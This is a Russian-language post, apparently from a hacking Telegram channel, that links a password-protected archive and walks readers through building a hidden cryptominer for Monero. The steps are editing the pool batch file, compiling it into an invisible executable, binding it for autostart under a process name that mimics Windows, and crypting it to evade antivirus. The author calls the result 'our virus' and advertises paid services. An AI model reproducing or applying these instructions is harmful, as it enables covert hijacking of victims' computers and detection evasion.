August 30, 2018

Слив скрытого майнера

Дарова бандиты, нашел этот архив на просторах интернета, решил что вам это будет интересно)

Ссылка на архив: https://drive.google.com/open?id=0BzAZDig3_kj3MHNJRU1QZ3JaRWc

пароль: lzt

Инструкция ⬇️

Сразу прошу не говорить на тему бесполезности 32-х битных компьютеров для майнинга, т.к.:

1) Их больше, хотя профит от одного отдельно взятого 32х битного компа меньше, чем от х64

2) И на 64-битных системах этот майнер работает.

Из этого следует, что профит будет вероятно даже больший, чем с обычных 64-битных майнеров.

Возможно эта тема уже поднималась

, возможно нет, но думаю, что напомнить будет не лишним.

Итак, приступим!

Для создания данного билда нам понадобятся:

1) Исходники (взяты отсюда https://ru.minergate.com/altminers/claymore-cpu), они есть в архиве.

2) bat2exe.exe

3) OXI_Joiner.exe

4) Криптор, вы можете взять любой

Советую сделать его самим.

Чтобы начать зарегаемся на MinerGate https://ru.minergate.com/

Наконец сам майнер.

Открываем папку x32, там наши исходники. Жмём ПКМ по "pool 32bit.bat" и жмём изменить, открывается блокнот и там такая запись:

windrws.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

windrws.exe - это название самого майнера, который мы будем запускать с параметрами указанными в этом батнике, при запущенном майнере процесс в диспетчере задач будет называться именно так, при желании сам windrws.exe , который лежит в папке x32 можно переименовать, но тогда придётся изменить название и в pool 32bit.bat

tcp://xmr.pool.minergate.com:45560 означает то, что мы будем майнить MONERO

Ниже приведу весь список:

BCN tcp://bcn.pool.minergate.com:45550

XMR tcp://xmr.pool.minergate.com:45560

QCN tcp://qcn.pool.minergate.com:45570

XDN tcp://xdn.pool.minergate.com:45620

FCN tcp://fcn.pool.minergate.com:45610

MCN tcp://mcn.pool.minergate.com:45640

DSH tcp://dsh.pool.minergate.com:45720

INF8 tcp://inf8.pool.minergate.com:45750

XDN+XMR tcp://xdn-xmr.pool.minergate.com:45790

FCN+XMR tcp://fcn-xmr.pool.minergate.com:45590

FCN+QCN tcp://fcn-qcn.pool.minergate.com:45600

FCN+DSH tcp://fcn-dsh.pool.minergate.com:45730

FCN+INF8 tcp://fcn-inf8.pool.minergate.com:45760

MCN+QCN tcp://mcn-qcn.pool.minergate.com:45670

MCN+DSH tcp://mcn-dsh.pool.minergate.com:45740

MCN+INF8 tcp://mcn-inf8.pool.minergate.com:45770

Далее меняем [email protected] на наш e-mail, указанный при регистрации на MinerGate'е.

Закрываем, сохраняем.

Следующий шаг - делаем из bat-ника exe-шник, для этого запускаем bat2exe.exe

Указываем путь к нашему батнику и ставим галочку на "Невидимое приложение", как на картинке ниже.

Жмём "Компилировать"

Закрываем bat2exe

Теперь BAT-ник можем удалить, он нам больше не пригодится.

Далее нам нужно сделать из 2х exe-шников 1 с автозапуском, для этого открываем OXI_Joiner.exe

Он выглядит так:

Жмём на большой зелёный (как слоник) плюсик и выбираем наш pool 32bit.exe

Должно получиться это:

Пото дважы кликаем в программе по pool 32bit.exe и выставляем параметры как на картинке.

Путь можете выбрать любой, главное запомните его, он нам понадобится

Жмём большую зелёную галочку.

Далее опять жмём зелёный плюсик и добавляем windrws.exe или как вы его там обозвали, у меня это выглядит так:

Также дважды кликаем на windrws.exe и выставляем параметры как на картинке.

Важно! Для особо невнимательных, параметры тут ДРУГИЕ! Папку указываем ту же, что и в первом случае, у меня это C:\ProgramData\Windows

Опять таки жмём на большую зелёную галочку.

Далее во вкладке "Внешний вид" мы можем поменять иконку и Version info, но в данном случае особого смысла в этом нет :)

Теперь жмём на большую шестерёнку на фиолетовом фоне и сохраняем наш вирус.

Остался последний штрих, закриптовать всё это дело.

Итак, чтобы закриптовать открываем "криптор.exe", нажимаем file и указываем путь к нашему новоиспечённому майнеру (я не стал менять название, поэтому у меня он joined.exe) и жмём Crypt, выбираем куда и под каким именем сохранить и всё, майнер готов!

Наши услуги: @GOdayBot

Внимание!!! Вся Информация на канале "0-day | Уязвимость 0-го дня" для ознакомления, не несёт в себе призыва к чему-либо, автор не несёт никакой ответственности. 18